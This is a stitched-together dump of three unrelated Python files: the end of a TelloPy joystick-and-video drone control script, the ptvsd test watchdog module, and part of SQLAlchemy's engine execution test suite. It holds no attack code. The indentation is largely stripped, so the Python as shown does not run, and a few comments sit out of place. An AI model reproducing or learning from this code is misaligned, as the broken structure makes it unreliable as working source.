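# max_delta=0.3, update(0.2, 0.25) returns 0.25 because |0.2 - 0.25| = 0.05 is
# within max_delta, while update(0.2, 0.9) returns 0.0 because the jump of 0.7
# exceeds max_delta and the stick value is reset to zero.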
def handle_input_event(drone, e):
global speed
global throttle
global yaw
global pitch
global roll
if e.type == pygame.locals.JOYAXISMOTION:
# ignore small input values (Deadzone)
if -buttons.DEADZONE <= e.value and e.value <= buttons.DEADZONE:
e.value = 0.0
if e.axis == buttons.LEFT_Y:
throttle = update(throttle, e.value * buttons.LEFT_Y_REVERSE)
drone.set_throttle(throttle)
if e.axis == buttons.LEFT_X:
yaw = update(yaw, e.value * buttons.LEFT_X_REVERSE)
drone.set_yaw(yaw)
if e.axis == buttons.RIGHT_Y:
pitch = update(pitch, e.value *
buttons.RIGHT_Y_REVERSE)
drone.set_pitch(pitch)
if e.axis == buttons.RIGHT_X:
roll = update(roll, e.value * buttons.RIGHT_X_REVERSE)
drone.set_roll(roll)
elif e.type == pygame.locals.JOYHATMOTION:
if e.value[0] < 0:
drone.counter_clockwise(speed)
if e.value[0] == 0:
drone.clockwise(0)
if e.value[0] > 0:
drone.clockwise(speed)
if e.value[1] < 0:
drone.down(speed)
if e.value[1] == 0:
drone.up(0)
if e.value[1] > 0:
drone.up(speed)
elif e.type == pygame.locals.JOYBUTTONDOWN:
if e.button == buttons.LAND:
drone.land()
elif e.button == buttons.UP:
drone.up(speed)
elif e.button == buttons.DOWN:
drone.down(speed)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(speed)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(speed)
elif e.button == buttons.FORWARD:
drone.forward(speed)
elif e.button == buttons.BACKWARD:
drone.backward(speed)
elif e.button == buttons.RIGHT:
drone.right(speed)
elif e.button == buttons.LEFT:
drone.left(speed)
elif e.type == pygame.locals.JOYBUTTONUP:
if e.button == buttons.TAKEOFF:
if throttle != 0.0:
print('###')
print('### throttle != 0.0 (This may hinder the drone from taking off)')
print('###')
drone.takeoff()
elif e.button == buttons.UP:
drone.up(0)
elif e.button == buttons.DOWN:
drone.down(0)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(0)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(0)
elif e.button == buttons.FORWARD:
drone.forward(0)
elif e.button == buttons.BACKWARD:
drone.backward(0)
elif e.button == buttons.RIGHT:
drone.right(0)
elif e.button == buttons.LEFT:
drone.left(0)
def draw_text(image, text, row):
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.5
font_size = 24
font_color = (255,255,255)
bg_color = (0,0,0)
d = 2
height, width = image.shape[:2]
    left_margin = 10
    if row < 0:
        pos = (left_margin, height + font_size * row + 1)
    else:
        pos = (left_margin, font_size * (row + 1))
cv2.putText(image, text, pos, font, font_scale, bg_color, 6)
cv2.putText(image, text, pos, font, font_scale, font_color, 1)
def recv_thread(drone):
global run_recv_thread
global new_image
global flight_data
global log_data
print('start recv_thread()')
try:
container = av.open(drone.get_video_stream())
# skip first 300 frames
frame_skip = 300
while True:
for frame in container.decode(video=0):
if 0 < frame_skip:
frame_skip = frame_skip - 1
continue
start_time = time.time()
image = cv2.cvtColor(numpy.array(frame.to_image()), cv2.COLOR_RGB2BGR)
if flight_data:
draw_text(image, 'TelloPy: joystick_and_video ' + str(flight_data), 0)
if log_data:
draw_text(image, 'MVO: ' + str(log_data.mvo), -3)
draw_text(image, ('IMU: ' + str(log_data.imu))[0:52], -2)
draw_text(image, ' ' + ('IMU: ' + str(log_data.imu))[52:], -1)
new_image = image
if frame.time_base < 1.0/60:
time_base = 1.0/60
else:
time_base = frame.time_base
frame_skip = int((time.time() - start_time)/time_base)
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
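# Note on the frame-skip arithmetic above (descriptive comment added for
# clarity): time_base is clamped to at least 1/60 s and
# frame_skip = int(elapsed / time_base), so if drawing a frame took e.g.
# 0.05 s at a 1/60 s time base, roughly int(0.05 * 60) = 3 frames are skipped
# to keep the display in step with the live stream.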
def main():
global buttons
global run_recv_thread
global new_image
pygame.init()
pygame.joystick.init()
current_image = None
try:
js = pygame.joystick.Joystick(0)
js.init()
js_name = js.get_name()
print('Joystick name: ' + js_name)
if js_name in ('Wireless Controller', 'Sony Computer Entertainment Wireless Controller'):
buttons = JoystickPS4
elif js_name == 'Sony Interactive Entertainment Wireless Controller':
buttons = JoystickPS4ALT
elif js_name in ('PLAYSTATION(R)3 Controller', 'Sony PLAYSTATION(R)3 Controller'):
buttons = JoystickPS3
elif js_name == 'Xbox One Wired Controller':
buttons = JoystickXONE
elif js_name == 'FrSky Taranis Joystick':
buttons = JoystickTARANIS
except pygame.error:
pass
if buttons is None:
print('no supported joystick found')
return
drone = tellopy.Tello()
drone.connect()
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.subscribe(drone.EVENT_LOG_DATA, handler)
threading.Thread(target=recv_thread, args=[drone]).start()
try:
while 1:
            # polling pygame.event.get() in a tight loop without a short sleep wastes CPU
time.sleep(0.01)
for e in pygame.event.get():
handle_input_event(drone, e)
if current_image is not new_image:
cv2.imshow('Tello', new_image)
current_image = new_image
cv2.waitKey(1)
except KeyboardInterrupt as e:
print(e)
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(e)
run_recv_thread = False
cv2.destroyAllWindows()
drone.quit()
exit(1)
if __name__ == '__main__':
main()
|
__init__.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""A watchdog process for debuggee processes spawned by tests.
Interacts with the main test runner process over stdio, and keeps track of running
ptvsd processes. If the test runner process goes down, any ptvsd test processes
are automatically killed.
"""
__all__ = ["start", "register_spawn", "unregister_spawn"]
import atexit
import os
import psutil
import subprocess
import sys
import threading
import time
from ptvsd.common import fmt, log, messaging
from tests.watchdog import worker
WATCHDOG_TIMEOUT = 3
_name = fmt("watchdog-{0}", os.getpid())
_stream = None
_process = None
_worker_log_filename = None
def start():
global _stream, _process, _worker_log_filename
if _stream is not None:
return
args = [sys.executable, worker.__file__, str(os.getpid())]
log.info(
"Spawning {0} for tests-{1}:\n\n{2}",
_name,
os.getpid(),
"\n".join(repr(s) for s in args),
)
_process = psutil.Popen(
args, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
_stream = messaging.JsonIOStream(_process.stdout, _process.stdin, _name)
event, _worker_log_filename = _stream.read_json()
assert event == "watchdog"
atexit.register(stop)
def _dump_worker_log(command, problem, exc_info=None):
reason = fmt("{0}.{1}() {2}", _name, command, problem)
if _worker_log_filename is None:
reason += ", but there is no log."
else:
try:
with open(_worker_log_filename) as f:
worker_log = f.read()
except Exception:
reason += fmt(", but log {0} could not be retrieved.", _worker_log_filename)
else:
reason += fmt("; watchdog worker process log:\n\n{0}", worker_log)
if exc_info is None:
log.error("{0}", reason)
else:
log.exception("{0}", reason, exc_info=exc_info)
return reason
def _invoke(command, *args):
def timeout():
time.sleep(WATCHDOG_TIMEOUT)
if timeout.occurred is None:
reason = _dump_worker_log(command, "timed out")
timeout.occurred = reason
timeout.occurred = None
timeout_thread = threading.Thread(target=timeout)
timeout_thread.daemon = True
timeout_thread.start()
try:
try:
_stream.write_json([command] + list(args))
response = _stream.read_json()
assert response == ["ok"], fmt("{0} {1!r}", _name, response)
finally:
timeout.occurred = False
except Exception:
_dump_worker_log(command, "failed", sys.exc_info())
raise
else:
assert not timeout.occurred, str(timeout.occurred)
def stop():
if _stream is None:
return
try:
_invoke("stop")
_stream.close()
except Exception:
log.exception()
def register_spawn(pid, name):
if _stream is None:
start()
_invoke("register_spawn", pid, name)
def unregister_spawn(pid, name):
assert _stream is not None
_invoke("unregister_spawn", pid, name)
|
test_execute.py
|
# coding: utf-8
from contextlib import contextmanager
import re
import threading
import weakref
import sqlalchemy as tsa
from sqlalchemy import bindparam
from sqlalchemy import create_engine
from sqlalchemy import create_mock_engine
from sqlalchemy import event
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import INT
from sqlalchemy import Integer
from sqlalchemy import LargeBinary
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Sequence
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import TypeDecorator
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import default
from sqlalchemy.engine.base import Connection
from sqlalchemy.engine.base import Engine
from sqlalchemy.pool import NullPool
from sqlalchemy.pool import QueuePool
from sqlalchemy.sql import column
from sqlalchemy.sql import literal
from sqlalchemy.sql.elements import literal_column
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.assertions import expect_deprecated
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import picklers
from sqlalchemy.util import collections_abc
class SomeException(Exception):
pass
class Foo(object):
def __str__(self):
return "foo"
def __unicode__(self):
return util.u("fóó")
class ExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
)
def test_no_params_option(self):
stmt = (
"SELECT '%'"
+ testing.db.dialect.statement_compiler(
testing.db.dialect, None
).default_from()
)
with testing.db.connect() as conn:
result = (
conn.execution_options(no_parameters=True)
.exec_driver_sql(stmt)
.scalar()
)
eq_(result, "%")
def test_raw_positional_invalid(self, connection):
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) " "values (?, ?)",
[2, "fred"],
)
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) " "values (?, ?)",
[[3, "ed"], [4, "horse"]],
)
def test_raw_named_invalid(self, connection):
# this is awkward because it is just testing whether plain Python
# raises TypeError when arguments are sent that happen to look like
# the legacy ones, which also conflict with the positional signature
# of the method. some combinations can get through and fail
# differently
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 2, "name": "ed"},
{"id": 3, "name": "horse"},
{"id": 4, "name": "horse"},
)
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
id=4,
name="sally",
)
@testing.requires.qmark_paramstyle
def test_raw_qmark(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(2, "fred"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
[(3, "ed"), (4, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
[(5, "barney"), (6, "donkey")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (?, ?)",
(7, "sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "fred"),
(3, "ed"),
(4, "horse"),
(5, "barney"),
(6, "donkey"),
(7, "sally"),
]
res = conn.exec_driver_sql(
"select * from users where user_name=?", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.format_paramstyle
def test_raw_sprintf(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
[(2, "ed"), (3, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (%s, %s)",
(4, "sally"),
)
conn.exec_driver_sql("insert into users (user_id) values (%s)", (5,))
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
(5, None),
]
res = conn.exec_driver_sql(
"select * from users where user_name=%s", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.pyformat_paramstyle
def test_raw_python(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
dict(id=4, name="sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
@testing.requires.named_paramstyle
def test_raw_named(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) " "values (:id, :name)",
{"id": 4, "name": "sally"},
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
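# NotADict implements the Mapping ABC without subclassing dict; execute()
# should accept it as the bind parameter collection just like a plain dict.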
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
def test_dialect_has_table_assertion(self):
with expect_raises_message(
tsa.exc.ArgumentError,
r"The argument passed to Dialect.has_table\(\) should be a",
):
testing.db.dialect.has_table(testing.db, "some_table")
def test_exception_wrapping_dbapi(self):
with testing.db.connect() as conn:
# engine does not have exec_driver_sql
assert_raises_message(
tsa.exc.DBAPIError,
r"not_a_valid_statement",
conn.exec_driver_sql,
"not_a_valid_statement",
)
@testing.requires.sqlite
def test_exception_wrapping_non_dbapi_error(self):
e = create_engine("sqlite://")
e.dialect.is_disconnect = is_disconnect = Mock()
with e.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(
execute=Mock(
side_effect=TypeError("I'm not a DBAPI error")
)
)
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
eq_(is_disconnect.call_count, 0)
def test_exception_wrapping_non_standard_dbapi_error(self):
class DBAPIError(Exception):
pass
class OperationalError(DBAPIError):
pass
class NonStandardException(OperationalError):
pass
# TODO: this test assumes too much about arbitrary dialects and would
# be better tested against a single mock dialect that does not
# have any special behaviors
with patch.object(
testing.db.dialect, "dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "is_disconnect", lambda *arg: False
), patch.object(
testing.db.dialect,
"do_execute",
Mock(side_effect=NonStandardException),
), patch.object(
testing.db.dialect.execution_ctx_cls,
"handle_dbapi_exception",
Mock(),
):
with testing.db.connect() as conn:
assert_raises(
tsa.exc.OperationalError, conn.exec_driver_sql, "select 1"
)
def test_exception_wrapping_non_dbapi_statement(self):
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise SomeException("nope")
def _go(conn):
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
with testing.db.connect() as conn:
_go(conn)
def test_not_an_executable(self):
for obj in (
Table("foo", MetaData(), Column("x", Integer)),
Column("x", Integer),
tsa.and_(True),
tsa.and_(True).compile(),
column("foo"),
column("foo").compile(),
select(1).cte(),
# select(1).subquery(),
MetaData(),
Integer(),
tsa.Index(name="foo"),
tsa.UniqueConstraint("x"),
):
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object",
conn.execute,
obj,
)
def test_subquery_exec_warning(self):
for obj in (select(1).alias(), select(1).subquery()):
with testing.db.connect() as conn:
with expect_deprecated(
"Executing a subquery object is deprecated and will "
"raise ObjectNotExecutableError"
):
eq_(conn.execute(obj).scalar(), 1)
def test_stmt_exception_bytestring_raised(self):
name = util.u("méil")
users = self.tables.users
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
util.u(
"A value is required for bind parameter 'uname'\n"
r".*SELECT users.user_name AS .m\xe9il."
)
if util.py2k
else util.u(
"A value is required for bind parameter 'uname'\n"
".*SELECT users.user_name AS .méil."
),
conn.execute,
select(users.c.user_name.label(name)).where(
users.c.user_name == bindparam("uname")
),
{"uname_incorrect": "foo"},
)
def test_stmt_exception_bytestring_utf8(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = util.u("some message méil").encode("utf-8")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
# string passes it through
eq_(str(err), message)
# unicode accessor decodes to utf-8
eq_(unicode(err), util.u("some message méil")) # noqa F821
else:
eq_(str(err), util.u("some message méil"))
def test_stmt_exception_bytestring_latin1(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = util.u("some message méil").encode("latin-1")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
# string passes it through
eq_(str(err), message)
# unicode accessor can't fully decode as utf-8; undecodable bytes
# come back backslash-escaped
eq_(unicode(err), util.u("some message m\\xe9il")) # noqa F821
else:
eq_(str(err), util.u("some message m\\xe9il"))
def test_stmt_exception_unicode_hook_unicode(self):
# uncommon case for Py2K, Unicode object passed
# as the error message
message = util.u("some message méil")
err = tsa.exc.SQLAlchemyError(message)
if util.py2k:
eq_(unicode(err), util.u("some message méil")) # noqa F821
else:
eq_(str(err), util.u("some message méil"))
def test_stmt_exception_object_arg(self):
err = tsa.exc.SQLAlchemyError(Foo())
eq_(str(err), "foo")
if util.py2k:
eq_(unicode(err), util.u("fóó")) # noqa F821
def test_stmt_exception_str_multi_args(self):
err = tsa.exc.SQLAlchemyError("some message", 206)
eq_(str(err), "('some message', 206)")
def test_stmt_exception_str_multi_args_bytestring(self):
message = util.u("some message méil").encode("utf-8")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_str_multi_args_unicode(self):
message = util.u("some message méil")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_pickleable_no_dbapi(self):
self._test_stmt_exception_pickleable(Exception("hello world"))
@testing.crashes(
"postgresql+psycopg2",
"Older versions don't support cursor pickling, newer ones do",
)
@testing.fails_on(
"mysql+oursql",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"mysql+mysqlconnector",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"oracle+cx_oracle",
"cx_oracle exception seems to be having " "some issue with pickling",
)
def test_stmt_exception_pickleable_plus_dbapi(self):
raw = testing.db.raw_connection()
the_orig = None
try:
try:
cursor = raw.cursor()
cursor.execute("SELECTINCORRECT")
except testing.db.dialect.dbapi.Error as orig:
# py3k has "orig" in local scope...
the_orig = orig
finally:
raw.close()
self._test_stmt_exception_pickleable(the_orig)
def _test_stmt_exception_pickleable(self, orig):
for sa_exc in (
tsa.exc.StatementError(
"some error",
"select * from table",
{"foo": "bar"},
orig,
False,
),
tsa.exc.InterfaceError(
"select * from table", {"foo": "bar"}, orig, True
),
tsa.exc.NoReferencedTableError("message", "tname"),
tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
tsa.exc.CircularDependencyError(
"some message", [1, 2, 3], [(1, 2), (3, 4)]
),
):
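# round-trip each exception through every available pickler and verify
# that the significant attributes survive unpickling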
for loads, dumps in picklers():
repickled = loads(dumps(sa_exc))
eq_(repickled.args[0], sa_exc.args[0])
if isinstance(sa_exc, tsa.exc.StatementError):
eq_(repickled.params, {"foo": "bar"})
eq_(repickled.statement, sa_exc.statement)
if hasattr(sa_exc, "connection_invalidated"):
eq_(
repickled.connection_invalidated,
sa_exc.connection_invalidated,
)
eq_(repickled.orig.args[0], orig.args[0])
def test_dont_wrap_mixin(self):
class MyException(Exception, tsa.exc.DontWrapMixin):
pass
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise MyException("nope")
def _go(conn):
assert_raises_message(
MyException,
"nope",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
conn = testing.db.connect()
try:
_go(conn)
finally:
conn.close()
def test_empty_insert(self, connection):
"""test that execute() interprets [] as a list with no params"""
users_autoinc = self.tables.users_autoinc
connection.execute(
users_autoinc.insert().values(user_name=bindparam("name", None)),
[],
)
eq_(connection.execute(users_autoinc.select()).fetchall(), [(1, None)])
@testing.only_on("sqlite")
def test_execute_compiled_favors_compiled_paramstyle(self):
users = self.tables.users
with patch.object(testing.db.dialect, "do_execute") as do_exec:
stmt = users.update().values(user_id=1, user_name="foo")
d1 = default.DefaultDialect(paramstyle="format")
d2 = default.DefaultDialect(paramstyle="pyformat")
with testing.db.begin() as conn:
conn.execute(stmt.compile(dialect=d1))
conn.execute(stmt.compile(dialect=d2))
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_id=%s, user_name=%s",
(1, "foo"),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_id=%(user_id)s, "
"user_name=%(user_name)s",
{"user_name": "foo", "user_id": 1},
mock.ANY,
),
],
)
@testing.requires.ad_hoc_engines
def test_engine_level_options(self):
eng = engines.testing_engine(
options={"execution_options": {"foo": "bar"}}
)
with eng.connect() as conn:
eq_(conn._execution_options["foo"], "bar")
eq_(
conn.execution_options(bat="hoho")._execution_options["foo"],
"bar",
)
eq_(
conn.execution_options(bat="hoho")._execution_options["bat"],
"hoho",
)
eq_(
conn.execution_options(foo="hoho")._execution_options["foo"],
"hoho",
)
eng.update_execution_options(foo="hoho")
conn = eng.connect()
eq_(conn._execution_options["foo"], "hoho")
@testing.requires.ad_hoc_engines
def test_generative_engine_execution_options(self):
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
is_(eng.engine, eng)
eng1 = eng.execution_options(foo="b1")
is_(eng1.engine, eng1)
eng2 = eng.execution_options(foo="b2")
eng1a = eng1.execution_options(bar="a1")
eng2a = eng2.execution_options(foo="b3", bar="a2")
is_(eng2a.engine, eng2a)
eq_(eng._execution_options, {"base": "x1"})
eq_(eng1._execution_options, {"base": "x1", "foo": "b1"})
eq_(eng2._execution_options, {"base": "x1", "foo": "b2"})
eq_(eng1a._execution_options, {"base": "x1", "foo": "b1", "bar": "a1"})
eq_(eng2a._execution_options, {"base": "x1", "foo": "b3", "bar": "a2"})
is_(eng1a.pool, eng.pool)
# test pool is shared
eng2.dispose()
is_(eng1a.pool, eng2.pool)
is_(eng.pool, eng2.pool)
@testing.requires.ad_hoc_engines
def test_autocommit_option_no_issue_first_connect(self):
eng = create_engine(testing.db.url)
eng.update_execution_options(autocommit=True)
conn = eng.connect()
eq_(conn._execution_options, {"autocommit": True})
conn.close()
def test_initialize_rollback(self):
"""test a rollback happens during first connect"""
eng = create_engine(testing.db.url)
with patch.object(eng.dialect, "do_rollback") as do_rollback:
assert do_rollback.call_count == 0
connection = eng.connect()
assert do_rollback.call_count == 1
connection.close()
@testing.requires.ad_hoc_engines
def test_dialect_init_uses_options(self):
eng = create_engine(testing.db.url)
def my_init(connection):
connection.execution_options(foo="bar").execute(select(1))
with patch.object(eng.dialect, "initialize", my_init):
conn = eng.connect()
eq_(conn._execution_options, {})
conn.close()
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch_hasevents(self):
def l1(*arg, **kw):
pass
eng = create_engine(testing.db.url)
assert not eng._has_events
event.listen(eng, "before_execute", l1)
eng2 = eng.execution_options(foo="bar")
assert eng2._has_events
def test_works_after_dispose(self):
eng = create_engine(testing.db.url)
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_works_after_dispose_testing_engine(self):
eng = engines.testing_engine()
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_scalar(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalar(select(users.c.user_name).order_by(users.c.user_id))
eq_(res, "sandy")
def test_scalars(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalars(select(users.c.user_name).order_by(users.c.user_id))
eq_(res.all(), ["sandy", "spongebob"])
class UnicodeReturnsTest(fixtures.TestBase):
@testing.requires.python3
def test_unicode_test_not_in_python3(self):
eng = engines.testing_engine()
eng.dialect.returns_unicode_strings = String.RETURNS_UNKNOWN
assert_raises_message(
tsa.exc.InvalidRequestError,
"RETURNS_UNKNOWN is unsupported in Python 3",
eng.connect,
)
@testing.requires.python2
def test_unicode_test_fails_warning(self):
class MockCursor(engines.DBAPIProxyCursor):
def execute(self, stmt, params=None, **kw):
if "test unicode returns" in stmt:
raise self.engine.dialect.dbapi.DatabaseError("boom")
else:
return super(MockCursor, self).execute(stmt, params, **kw)
eng = engines.proxying_engine(cursor_cls=MockCursor)
with testing.expect_warnings(
"Exception attempting to detect unicode returns"
):
eng.connect()
# because a plain VARCHAR was passed, we don't know the correct answer
eq_(eng.dialect.returns_unicode_strings, String.RETURNS_CONDITIONAL)
eng.dispose()
class ConvenienceExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.table = Table(
"exec_test",
metadata,
Column("a", Integer),
Column("b", Integer),
test_needs_acid=True,
)
def _trans_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
return go
def _trans_rollback_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
raise SomeException("breakage")
return go
def _assert_no_data(self):
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count("*")).select_from(self.table)),
0,
)
def _assert_fn(self, x, value=None):
with testing.db.connect() as conn:
eq_(conn.execute(self.table.select()).fetchall(), [(x, value)])
def test_transaction_engine_ctx_commit(self):
fn = self._trans_fn()
ctx = testing.db.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_engine_ctx_begin_fails_dont_enter_enter(self):
"""test #7272"""
engine = engines.testing_engine()
mock_connection = Mock(
return_value=Mock(begin=Mock(side_effect=Exception("boom")))
)
with mock.patch.object(engine, "_connection_cls", mock_connection):
if testing.requires.legacy_engine.enabled:
with expect_raises_message(Exception, "boom"):
engine.begin()
else:
# context manager isn't entered, doesn't actually call
# connect() or connection.begin()
engine.begin()
if testing.requires.legacy_engine.enabled:
eq_(mock_connection.return_value.close.mock_calls, [call()])
else:
eq_(mock_connection.return_value.close.mock_calls, [])
def test_transaction_engine_ctx_begin_fails_include_enter(self):
"""test #7272"""
engine = engines.testing_engine()
close_mock = Mock()
with mock.patch.object(
engine._connection_cls,
"begin",
Mock(side_effect=Exception("boom")),
), mock.patch.object(engine._connection_cls, "close", close_mock):
with expect_raises_message(Exception, "boom"):
with engine.begin():
pass
eq_(close_mock.mock_calls, [call()])
def test_transaction_engine_ctx_rollback(self):
fn = self._trans_rollback_fn()
ctx = testing.db.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_transaction_connection_ctx_commit(self):
fn = self._trans_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_connection_ctx_rollback(self):
fn = self._trans_rollback_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
